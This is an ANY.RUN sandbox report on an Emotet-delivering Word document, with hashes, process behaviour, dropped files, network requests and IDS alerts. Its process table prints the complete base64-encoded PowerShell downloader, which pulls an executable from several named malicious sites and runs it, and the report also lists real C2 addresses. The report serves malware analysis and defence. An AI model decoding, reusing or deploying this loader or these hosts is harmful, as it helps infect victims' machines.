analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

DOC

Full analysis: https://app.any.run/tasks/5585b44e-ca5a-44f5-bd00-6f5b9b840a14
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: February 19, 2019, 13:32:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 19 07:19:00 2019, Last Saved Time/Date: Tue Feb 19 07:19:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 8, Security: 0
MD5:

06984949B22B2731332CDA273308B642

SHA1:

AADD3B40A31D1AC4D338A914C8C8F81679390BF6

SHA256:

B6023DCB65CB101934C893A93AD6D5875BD5D406EB0E3790B952D041BBF0B8A0

SSDEEP:

6144:cG5/BnVfRFJ7KK9aHScdX9znGUy/KPVaRG7LrVMzCXjkN:c2n9R/lA5dX9znGURpLr+zCXjE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 194.exe (PID: 2616)
      • 194.exe (PID: 3520)
      • wabmetagen.exe (PID: 3048)
      • wabmetagen.exe (PID: 2432)
    • Emotet process was detected

      • wabmetagen.exe (PID: 3048)
    • Downloads executable files from the Internet

      • powersheLl.exe (PID: 3244)
    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 2432)
    • Connects to CnC server

      • wabmetagen.exe (PID: 2432)
    • EMOTET was detected

      • wabmetagen.exe (PID: 2432)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powersheLl.exe (PID: 3244)
      • 194.exe (PID: 3520)
    • Creates files in the user directory

      • powersheLl.exe (PID: 3244)
    • Application launched itself

      • 194.exe (PID: 2616)
    • Starts itself from another location

      • 194.exe (PID: 3520)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3484)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3484)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:02:19 07:19:00
ModifyDate: 2019:02:19 07:19:00
Pages: 1
Words: 1
Characters: 8
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 8
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 194.exe no specs 194.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
3484"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOC.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3244powersheLl -e JABCAF8AXwAzADYAOQA0AD0AKAAnAEIANAAwACcAKwAnADAAXwAzACcAKQA7ACQATgA2AF8ANgAyADkAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABjADAAXwAxADkAXwA9ACgAJwBoAHQAdABwADoALwAvAGMAJwArACcAaABpACcAKwAnAGwAZQAnACsAJwB2AGUAbgAuAGMAbwBtACcAKwAnAC8AQwB5AEoAJwArACcARQBYAHgAJwArACcAUgBXAGQAVgAnACsAJwBpAEgAJwArACcAUgBrAF8AVwBpAFEAJwArACcAVwAnACsAJwBAAGgAdAAnACsAJwB0ACcAKwAnAHAAOgAvAC8AZQB1AHIAbwBiAGEAbgBkAHUAJwArACcAcwBlAGQAdABpACcAKwAnAHIAZQBzAC4AYwAnACsAJwBvAG0ALwB6AFAASABqAHgAJwArACcAZwBIAE8ATwBjAEUATABEAEQAdABAACcAKwAnAGgAJwArACcAdAB0AHAAOgAvAC8AYwAnACsAJwBsAGUAJwArACcAYQBuAGUAYQB0ACcAKwAnAG8AbAAnACsAJwBvACcAKwAnAGcAeQBiAGwAbwBnACcAKwAnAC4AJwArACcAYwAnACsAJwBvACcAKwAnAG0ALwBoACcAKwAnAHkAaQAnACsAJwBDACcAKwAnAHYASgBDAHQAdAB1AGkAJwArACcATAB3ACcAKwAnAEAAJwArACcAaAB0ACcAKwAnAHQAcAAnACsAJwA6AC8AJwArACcALwBmAGEAaAByAGUAZAAnACsAJwBkACcAKwAnAGkAbgAnACsAJwAuACcAKwAnAGkAJwArACcAbgBmACcAKwAnAG8ALwBkACcAKwAnAFQAawBRAFMAdwBqACcAKwAnAGYAVQBrAE4AJwArACcAdQAnACsAJwBCACcAKwAnAG4AdgAnACsAJwBAACcAKwAnAGgAdAB0AHAAOgAvAC8AbgBlAHUAbQAnACsAJwBhACcAKwAnAHQAaQBjACcAKwAnAG8AcwB1ACcAKwAnAHQAJwArACcAaQAnACsAJwBsAGkAegBhACcAKwAnAGQAJwArACcAbwAnACsAJwBzAC4AJwArACcAYwBvAG0ALwBCAFkAJwArACcAdwBNAHgAVQBOAGYAeQBTACcAKwAnAEQAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQATABfAF8AXwBfAF8AMQBfAD0AKAAnAEQAJwArACcANwBfADYANwBfACcAKQA7ACQAZAA2AF8AXwA3ADMAXwAwACAAPQAgACgAJwAxADkAJwArACcANAAnACkAOwAkAEwAXwA3AF8AOAA0AF8APQAoACcAdQAnACsAJwAwAF8AOQBfADYAOQAnACkAOwAkAEQAMgBfADgAXwAxADQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGQANgBfAF8ANwAzAF8AMAArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEUAXwBfADIANAAzADMAXwAgAGkAbgAgACQAYwAwAF8AMQA5AF8AKQB7AHQAcgB5AHsAJABOADYAXwA2ADIAOQBfAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEUAXwBfADIANAAzADMAXwAsACAAJABEADIAXwA4AF8AMQA0ACkAOwAkAGYANABfAF8ANAAxADYAPQAoACcAUAA5AF8AXwA3AF8AJwArACcAOQAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABEADIAXwA4AF8AMQA0ACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQARAAyAF8AOABfADEANAA7ACQAbgAxADUAMABfADYANwAxAD0AKAAnAFgAOQA5AF8AXwAnACsAJwA1ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABrADcAXwA2ADkANgBfADAAPQAoACcAQwA0ACcAKwAnADIAXwA2ACcAKwAnADgAXwAwACcAKQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2616"C:\Users\admin\194.exe" C:\Users\admin\194.exepowersheLl.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS(r) DLL for Win32
Exit code:
0
Version:
13.0.0.047
3520"C:\Users\admin\194.exe"C:\Users\admin\194.exe
194.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS(r) DLL for Win32
Exit code:
0
Version:
13.0.0.047
3048"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
194.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS(r) DLL for Win32
Exit code:
0
Version:
13.0.0.047
2432"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS(r) DLL for Win32
Version:
13.0.0.047
Total events
1 666
Read events
1 252
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3484WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE001.tmp.cvr
MD5:
SHA256:
3244powersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S77FL9YNTT6MLMSJLXPC.temp
MD5:
SHA256:
3244powersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0586DB8FF5249AD980CEC7BF2CBC3708
SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2
3244powersheLl.exeC:\Users\admin\194.exeexecutable
MD5:026F2999E5D93E457CAD2DE8B566499D
SHA256:4481E2A5C10C37C1656E0DC62A2BF0A40B4ACA5078FDCE5D2F988417A7798FD4
3520194.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:1DDE9295B7FBB3A65F5A22B8E88C5678
SHA256:655245B098D5EC972A79C6348FAA4F4E60BD0D4B30104A14532EEBE55CFC7023
3484WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$DOC.docpgc
MD5:2A989F1F739D5BBC7A7CBB2203D63BBD
SHA256:9B8D5AF3AA7EF1195AE471C023F0E1173A7B7432397C6D89EF66B2539FD36DB4
3484WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:2C102FDB7BB36B8CA245937E5C75E197
SHA256:6EB76D3873C4AD1EB088A5251AC82406FE2DEB441BC0A81C6733F00302A0C37D
3244powersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1ae9e4.TMPbinary
MD5:0586DB8FF5249AD980CEC7BF2CBC3708
SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3244
powersheLl.exe
GET
200
66.70.176.6:80
http://chileven.com/cgi-sys/suspendedpage.cgi
CA
html
7.40 Kb
suspicious
3244
powersheLl.exe
GET
302
66.70.176.6:80
http://chileven.com/CyJEXxRWdViHRk_WiQW
CA
html
229 b
suspicious
3244
powersheLl.exe
GET
301
109.237.222.232:80
http://eurobandusedtires.com/zPHjxgHOOcELDDt
NL
html
253 b
suspicious
3244
powersheLl.exe
GET
200
109.237.222.232:80
http://eurobandusedtires.com/zPHjxgHOOcELDDt/
NL
executable
136 Kb
suspicious
2432
wabmetagen.exe
GET
200
66.216.234.131:443
http://66.216.234.131:443/
US
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2432
wabmetagen.exe
66.216.234.131:443
Charter Communications
US
malicious
3244
powersheLl.exe
66.70.176.6:80
chileven.com
OVH SAS
CA
suspicious
3244
powersheLl.exe
109.237.222.232:80
eurobandusedtires.com
Mihos
NL
suspicious

DNS requests

Domain
IP
Reputation
chileven.com
  • 66.70.176.6
suspicious
eurobandusedtires.com
  • 109.237.222.232
suspicious

Threats

PID
Process
Class
Message
3244
powersheLl.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3244
powersheLl.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3244
powersheLl.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2432
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info